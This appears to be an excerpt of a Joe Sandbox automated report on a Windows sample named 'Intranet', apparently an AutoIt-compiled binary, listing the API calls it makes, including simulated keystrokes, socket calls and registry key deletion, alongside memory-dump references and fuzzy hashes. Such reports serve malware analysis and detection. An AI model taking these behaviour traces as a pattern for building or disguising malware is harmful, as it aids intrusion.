                                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 0050184E
                                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 00501894
                                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 005018B7
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                            • String ID:
                                                                            • API String ID: 87235514-0
                                                                            • Opcode ID: 7f409524fc79068c8c4801aa111f1d40ee32cc534abee3382cda860964c226f5
                                                                            • Instruction ID: 18e6ff3108150d7e03b9398d9878001105b3ae7ec779bf95b623c0617a0a3aef
                                                                            • Opcode Fuzzy Hash: 7f409524fc79068c8c4801aa111f1d40ee32cc534abee3382cda860964c226f5
                                                                            • Instruction Fuzzy Hash: 5151F460A08BD53EFB364234CC55BBE7EE97F06300F0C8989E0D5468C2D298ED84D75A
                                                                            APIs
                                                                            • GetParent.USER32(00000000,00000000,00000000), ref: 005015A4
                                                                            • GetKeyboardState.USER32(?), ref: 005015B9
                                                                            • SetKeyboardState.USER32(?), ref: 0050161A
                                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00501646
                                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00501663
                                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 005016A7
                                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 005016C8
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                            • String ID:
                                                                            • API String ID: 87235514-0
                                                                            • Opcode ID: e2f7e3e8556eabbb86c57e1c1302ee15edcbcf105bec42ef3ca4a98753194333
                                                                            • Instruction ID: edcd4e60eeae7266871cd38acd1019ff3332197cd553395d43cc0bf1a55de78f
                                                                            • Opcode Fuzzy Hash: e2f7e3e8556eabbb86c57e1c1302ee15edcbcf105bec42ef3ca4a98753194333
                                                                            • Instruction Fuzzy Hash: 495106A0604FD53DFB328724CC15BBE7EA97B46300F0C4589E0D94A9C2C695EC98EB5A
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsncpy$LocalTime
                                                                            • String ID:
                                                                            • API String ID: 2945705084-0
                                                                            • Opcode ID: a42bcef1092dabacfc12604330a725991534b61e2cbdaef2a243c10408744eba
                                                                            • Instruction ID: 95dfb5153cbcc234abdf80aa95ddb4f811250b4a127796710b9d9ab25dcc6832
                                                                            • Opcode Fuzzy Hash: a42bcef1092dabacfc12604330a725991534b61e2cbdaef2a243c10408744eba
                                                                            • Instruction Fuzzy Hash: 3441CF6AC1061875CB51EBB5C84AECFB7B8AF04314F50885BE508E3161F678A715C7A9
                                                                            APIs
                                                                              • Part of subcall function 00504BC3: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00503B8A,?), ref: 00504BE0
                                                                              • Part of subcall function 00504BC3: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00503B8A,?), ref: 00504BF9
                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00503BAA
                                                                            • _wcscmp.LIBCMT ref: 00503BC6
                                                                            • MoveFileW.KERNEL32(?,?), ref: 00503BDE
                                                                            • _wcscat.LIBCMT ref: 00503C26
                                                                            • SHFileOperationW.SHELL32(?), ref: 00503C92
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                            • String ID: \*.*
                                                                            • API String ID: 1377345388-1173974218
                                                                            • Opcode ID: 95ae6d9de799c7989dcdb6c06c83597f8d94fe23408cd1f2b784cff06a500984
                                                                            • Instruction ID: 66c32f191a6250f9a0c06e896007db8990ecb4074b857cc54fc1f4479def6ba5
                                                                            • Opcode Fuzzy Hash: 95ae6d9de799c7989dcdb6c06c83597f8d94fe23408cd1f2b784cff06a500984
                                                                            • Instruction Fuzzy Hash: 1C418D71408345AAC752EF64C485ADFBBECBF88344F40196EF489C3291EB34D688CB56
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 005278CF
                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00527976
                                                                            • IsMenu.USER32(?), ref: 0052798E
                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 005279D6
                                                                            • DrawMenuBar.USER32 ref: 005279E9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Item$DrawInfoInsert_memset
                                                                            • String ID: 0
                                                                            • API String ID: 3866635326-4108050209
                                                                            • Opcode ID: 4f295303d54788fc5e08e051ea84ee0be8242c964cbca533747b3b9121116da9
                                                                            • Instruction ID: 8cd6b125cda30d3b33af0a2a282c5c73bff3d51b6bb91c4c4a0296aca43a6222
                                                                            • Opcode Fuzzy Hash: 4f295303d54788fc5e08e051ea84ee0be8242c964cbca533747b3b9121116da9
                                                                            • Instruction Fuzzy Hash: AE417975A08308EFDB20DF54E884E9ABBF9FF0A314F008129E95597290C774AD94DFA1
                                                                            APIs
                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00521631
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 0052165B
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00521712
                                                                              • Part of subcall function 00521602: RegCloseKey.ADVAPI32(?), ref: 00521678
                                                                              • Part of subcall function 00521602: FreeLibrary.KERNEL32(?), ref: 005216CA
                                                                              • Part of subcall function 00521602: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 005216ED
                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 005216B5
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                            • String ID:
                                                                            • API String ID: 395352322-0
                                                                            • Opcode ID: d935e6fc9dac39a9659da1c09bfd5bc992615e85703f1d1dfba6359138e9e358
                                                                            • Instruction ID: fa11282d770f2584f3d4ab16028cbce9bfdc9994e9ab44526c55bd1812cc1054
                                                                            • Opcode Fuzzy Hash: d935e6fc9dac39a9659da1c09bfd5bc992615e85703f1d1dfba6359138e9e358
                                                                            • Instruction Fuzzy Hash: E1312171901219BFDB149F90EC99EFFBBBCFF19301F040169E501A2290E6746E499BA4
                                                                            APIs
                                                                            • SendMessageW.USER32(?,000000F0,00000000,00000000,?,?,?,0052A461,?,?,?,?,?), ref: 00526911
                                                                            • GetWindowLongW.USER32(?,000000F0,?,?,?,0052A461,?,?,?,?,?), ref: 00526944
                                                                            • GetWindowLongW.USER32(?,000000F0,00000000,?,?,?,0052A461,?,?,?,?,?), ref: 00526979
                                                                            • SendMessageW.USER32(?,000000F1,00000000,00000000,00000000,?,?,?,0052A461,?,?,?,?,?), ref: 005269AB
                                                                            • SendMessageW.USER32(?,000000F1,00000001,00000000,?,?,?,0052A461,?,?,?,?), ref: 005269D5
                                                                            • GetWindowLongW.USER32(?,000000F0,?,?,?,0052A461,?,?,?,?), ref: 005269E6
                                                                            • SetWindowLongW.USER32(?,000000F0,00000000,?,?,?,0052A461,?,?,?,?), ref: 00526A00
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: LongWindow$MessageSend
                                                                            • String ID:
                                                                            • API String ID: 2178440468-0
                                                                            • Opcode ID: 6179153217985d16b04a9761afacbaf54c7ee4c97aecdf9fbb80a9d89ad88776
                                                                            • Instruction ID: f5d503f62ed003f88f1636c84f85ac8f2594c054ed32561f5884869000346149
                                                                            • Opcode Fuzzy Hash: 6179153217985d16b04a9761afacbaf54c7ee4c97aecdf9fbb80a9d89ad88776
                                                                            • Instruction Fuzzy Hash: 823116306042659FDB21CF18EC99F653BE1FB9A714F1811A4F5148B2F1CB72AC88EB90
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004FE2CA
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004FE2F0
                                                                            • #2.WSOCK32(00000000), ref: 004FE2F3
                                                                            • #2.WSOCK32(?), ref: 004FE311
                                                                            • #6.OLEAUT32(?), ref: 004FE31A
                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 004FE33F
                                                                            • #2.WSOCK32(?), ref: 004FE34D
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$FromString
                                                                            • String ID:
                                                                            • API String ID: 1211328463-0
                                                                            • Opcode ID: c6e00448e8a90815f13ccc0796cf9f4165f866fbe1a556441e31a2c97c23d563
                                                                            • Instruction ID: ada25f7f163be89539c81cefe7a9e7420fa3627862870f0b1221734c522810d1
                                                                            • Opcode Fuzzy Hash: c6e00448e8a90815f13ccc0796cf9f4165f866fbe1a556441e31a2c97c23d563
                                                                            • Instruction Fuzzy Hash: 3D21B23660020DAF9F10DFA9CC88CBF73ACEB09360B04812AFE14DB3A0D674AD459764
                                                                            APIs
                                                                              • Part of subcall function 00518475: #10.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 005184A0
                                                                            • #23.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 005168B1
                                                                            • #111.WSOCK32(00000000), ref: 005168C0
                                                                            • #12.WSOCK32(00000000,8004667E,00000000), ref: 005168F9
                                                                            • #4.WSOCK32(00000000,?,00000010), ref: 00516902
                                                                            • #111.WSOCK32 ref: 0051690C
                                                                            • #3.WSOCK32(00000000), ref: 00516935
                                                                            • #12.WSOCK32(00000000,8004667E,00000000), ref: 0051694E
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: #111
                                                                            • String ID:
                                                                            • API String ID: 568940515-0
                                                                            • Opcode ID: 54bbbb3547477a898fb17c11d98350f0ee17350995316a52fd9a8bdfae6674c3
                                                                            • Instruction ID: 17cdd3521f12d1c49b3703b1fbf64dce040856354c8c6a3cf7495d2559143d0c
                                                                            • Opcode Fuzzy Hash: 54bbbb3547477a898fb17c11d98350f0ee17350995316a52fd9a8bdfae6674c3
                                                                            • Instruction Fuzzy Hash: 7831A271600218AFEB10AF64CC85FFE7BA9FB95725F044029FD05AB2D1DB74AC449BA1
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004FE3A5
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 004FE3CB
                                                                            • #2.WSOCK32(00000000), ref: 004FE3CE
                                                                            • #2.WSOCK32 ref: 004FE3EF
                                                                            • #6.OLEAUT32 ref: 004FE3F8
                                                                            • StringFromGUID2.OLE32(?,?,00000028), ref: 004FE412
                                                                            • #2.WSOCK32(?), ref: 004FE420
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ByteCharMultiWide$FromString
                                                                            • String ID:
                                                                            • API String ID: 1211328463-0
                                                                            • Opcode ID: 40e472565c444cd87487eabfe3e14e248285131112a82ea612e017a991f1b03d
                                                                            • Instruction ID: 4b2990a580c527942df4ccc2742a4e7f922e4436653aa02ad4dbaa61ab39a6f1
                                                                            • Opcode Fuzzy Hash: 40e472565c444cd87487eabfe3e14e248285131112a82ea612e017a991f1b03d
                                                                            • Instruction Fuzzy Hash: 59218835604208AF9B109FA9DC88DBF77ECEB09361700852AFA15CB3B1D674ED459768
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsnicmp
                                                                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                            • API String ID: 1038674560-2734436370
                                                                            • Opcode ID: 926333776e3d215ee92b92c25be00030c71ec545fe07e4218e04922ebf7638e6
                                                                            • Instruction ID: eed9a588848f766d4cbe7c7024312995b2a1e73e1f93f00bf217d65d9fc1b233
                                                                            • Opcode Fuzzy Hash: 926333776e3d215ee92b92c25be00030c71ec545fe07e4218e04922ebf7638e6
                                                                            • Instruction Fuzzy Hash: AF214C3210011567D330AA269C02FBB77D8EF55704F50443FF686862A3E7AD9D4AC29D
                                                                            APIs
                                                                              • Part of subcall function 004A2111: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096,?,00000096,?,004A2004), ref: 004A214F
                                                                              • Part of subcall function 004A2111: GetStockObject.GDI32(00000011,00000000,?,00000096,?,004A2004,?,?,static,00530980,?,?,?,00000096,00000096,?), ref: 004A2163
                                                                              • Part of subcall function 004A2111: SendMessageW.USER32(00000000,00000030,00000000,?,00000096,?,004A2004,?,?,static,00530980,?,?,?,00000096,00000096), ref: 004A216D
                                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000,?,?,?,Msctls_Progress32,00000000,00000000,?,?,?,?,?,?), ref: 00527C57
                                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000,?,?,?,Msctls_Progress32,00000000,00000000,?,?,?,?,?,?), ref: 00527C64
                                                                            • SendMessageW.USER32(?,00000402,00000000,00000000,?,?,?,Msctls_Progress32,00000000,00000000,?,?,?,?,?,?), ref: 00527C6F
                                                                            • SendMessageW.USER32(?,00000401,00000000,00640000,?,?,?,Msctls_Progress32,00000000,00000000,?,?,?,?,?,?), ref: 00527C7E
                                                                            • SendMessageW.USER32(?,00000404,00000001,00000000,?,?,?,Msctls_Progress32,00000000,00000000,?,?,?,?,?,?), ref: 00527C8A
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                                            • String ID: Msctls_Progress32
                                                                            • API String ID: 1025951953-3636473452
                                                                            • Opcode ID: 66b43b7963109ddc838f32aaf731f0fb6fb036f1049108fa92c42f4399980494
                                                                            • Instruction ID: ef99ea7c3cc40b49391a20d49fbcc752ae2be91efb53dbe8c6eeb6f7ce0aa515
                                                                            • Opcode Fuzzy Hash: 66b43b7963109ddc838f32aaf731f0fb6fb036f1049108fa92c42f4399980494
                                                                            • Instruction Fuzzy Hash: 3E1190B215022EBEEF158F64DC85EE77F5DFF09798F014115BA08A6090C6729C21DBA4
                                                                            APIs
                                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,004F0817,?,?,00000000,00000000), ref: 00509EE8
                                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,004F0817,?,?,00000000,00000000), ref: 00509EFF
                                                                            • LoadResource.KERNEL32(?,00000000,?,?,004F0817,?,?,00000000,00000000,?,?,?,?,?,?,004B4A14), ref: 00509F0F
                                                                            • SizeofResource.KERNEL32(?,00000000,?,?,004F0817,?,?,00000000,00000000,?,?,?,?,?,?,004B4A14), ref: 00509F20
                                                                            • LockResource.KERNEL32(004F0817,?,?,004F0817,?,?,00000000,00000000,?,?,?,?,?,?,004B4A14,00000000), ref: 00509F2F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                            • String ID: SCRIPT
                                                                            • API String ID: 3051347437-3967369404
                                                                            • Opcode ID: f44527589a8dbfd3ed675aadc828d809c3f1b7347a99bf9fd6697cf88c4439f6
                                                                            • Instruction ID: a0686eb9158dc54919ec5d7bdd2400c73df1f0f59a24200adf6a2d2381bd5d4e
                                                                            • Opcode Fuzzy Hash: f44527589a8dbfd3ed675aadc828d809c3f1b7347a99bf9fd6697cf88c4439f6
                                                                            • Instruction Fuzzy Hash: C1115A74200701AFEB219B65DC88F277BB9FBC5B11F104268BA09D62A1DB71EC08D660
                                                                            APIs
                                                                            • __init_pointers.LIBCMT ref: 004C9D16
                                                                              • Part of subcall function 004C33B7: EncodePointer.KERNEL32(00000000), ref: 004C33BA
                                                                              • Part of subcall function 004C33B7: __initp_misc_winsig.LIBCMT ref: 004C33D5
                                                                              • Part of subcall function 004C33B7: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 004CA0D0
                                                                              • Part of subcall function 004C33B7: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 004CA0E4
                                                                              • Part of subcall function 004C33B7: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 004CA0F7
                                                                              • Part of subcall function 004C33B7: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 004CA10A
                                                                              • Part of subcall function 004C33B7: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 004CA11D
                                                                              • Part of subcall function 004C33B7: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 004CA130
                                                                              • Part of subcall function 004C33B7: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 004CA143
                                                                              • Part of subcall function 004C33B7: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 004CA156
                                                                              • Part of subcall function 004C33B7: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 004CA169
                                                                              • Part of subcall function 004C33B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 004CA17C
                                                                              • Part of subcall function 004C33B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 004CA18F
                                                                              • Part of subcall function 004C33B7: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 004CA1A2
                                                                              • Part of subcall function 004C33B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 004CA1B5
                                                                              • Part of subcall function 004C33B7: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 004CA1C8
                                                                              • Part of subcall function 004C33B7: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 004CA1DB
                                                                              • Part of subcall function 004C33B7: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 004CA1EE
